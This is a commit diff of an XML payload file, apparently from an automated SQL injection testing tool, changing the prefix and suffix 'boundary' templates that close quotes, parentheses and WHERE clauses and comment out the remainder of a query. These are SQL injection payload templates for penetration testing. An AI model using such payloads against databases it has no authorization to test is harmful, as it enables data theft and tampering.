Copy file name to clipboardExpand all lines: xml/payloads.xml
+37-19Lines changed: 37 additions & 19 deletions
@@ -451,21 +451,30 @@ Formats:
451
451
452
452
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
453
453
<boundary>
454
-
<level>4</level>
454
+
<level>5</level>
455
455
<clause>1</clause>
456
456
<where>1,2</where>
457
-
<ptype>1</ptype>
458
-
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
459
-
<suffix></suffix>
457
+
<ptype>2</ptype>
458
+
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
459
+
<suffix>-- AND ('[RANDSTR]'='[RANDSTR]</suffix>
460
460
</boundary>
461
461
462
462
<boundary>
463
463
<level>5</level>
464
464
<clause>1</clause>
465
465
<where>1,2</where>
466
466
<ptype>2</ptype>
467
-
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
468
-
<suffix></suffix>
467
+
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
468
+
<suffix>-- AND ("[RANDSTR]"="[RANDSTR]</suffix>
469
+
</boundary>
470
+
471
+
<boundary>
472
+
<level>4</level>
473
+
<clause>1</clause>
474
+
<where>1,2</where>
475
+
<ptype>1</ptype>
476
+
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
477
+
<suffix>-- AND ([RANDNUM1]=[RANDNUM1]</suffix>
469
478
</boundary>
470
479
471
480
<boundary>
@@ -474,7 +483,7 @@ Formats:
474
483
<where>1,2</where>
475
484
<ptype>2</ptype>
476
485
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
477
-
<suffix></suffix>
486
+
<suffix>-- AND '[RANDSTR]'='[RANDSTR]</suffix>
478
487
</boundary>
479
488
480
489
<boundary>
@@ -483,7 +492,16 @@ Formats:
483
492
<where>1,2</where>
484
493
<ptype>4</ptype>
485
494
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
486
-
<suffix></suffix>
495
+
<suffix>-- AND "[RANDSTR]"="[RANDSTR]</suffix>
496
+
</boundary>
497
+
498
+
<boundary>
499
+
<level>4</level>
500
+
<clause>1</clause>
501
+
<where>1,2</where>
502
+
<ptype>1</ptype>
503
+
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
504
+
<suffix>-- AND [RANDNUM1]=[RANDNUM1]</suffix>
487
505
</boundary>
488
506
<!-- End of pre-WHERE generic boundaries -->
489
507
@@ -493,43 +511,43 @@ Formats:
493
511
<clause>1</clause>
494
512
<where>1</where>
495
513
<ptype>2</ptype>
496
-
<prefix> || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
497
-
<suffix>)||</suffix>
514
+
<prefix>||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
515
+
<suffix>)||</suffix>
498
516
</boundary>
499
517
500
518
<boundary>
501
519
<level>5</level>
502
520
<clause>1</clause>
503
521
<where>1</where>
504
522
<ptype>2</ptype>
505
-
<prefix>||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
506
-
<suffix>)||</suffix>
523
+
<prefix>||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
524
+
<suffix>)||</suffix>
507
525
</boundary>
508
526
509
527
<boundary>
510
528
<level>5</level>
511
529
<clause>1</clause>
512
530
<where>1</where>
513
531
<ptype>2</ptype>
514
-
<prefix>' || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
515
-
<suffix>) || '</suffix>
532
+
<prefix>'||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
533
+
<suffix>)||'</suffix>
516
534
</boundary>
517
535
518
536
<boundary>
519
537
<level>5</level>
520
538
<clause>1</clause>
521
539
<where>1</where>
522
540
<ptype>2</ptype>
523
-
<prefix>' || (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
524
-
<suffix>) || '</suffix>
541
+
<prefix>'||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
542
+
<suffix>)||'</suffix>
525
543
</boundary>
526
544
527
545
<boundary>
528
546
<level>5</level>
529
547
<clause>1</clause>
530
548
<where>1</where>
531
549
<ptype>1</ptype>
532
-
<prefix> + (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
550
+
<prefix>+(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
533
551
<suffix>)</suffix>
534
552
</boundary>
535
553
@@ -538,8 +556,8 @@ Formats:
538
556
<clause>1</clause>
539
557
<where>1</where>
540
558
<ptype>2</ptype>
541
-
<prefix>' + (SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
542
-
<suffix>) + '</suffix>
559
+
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>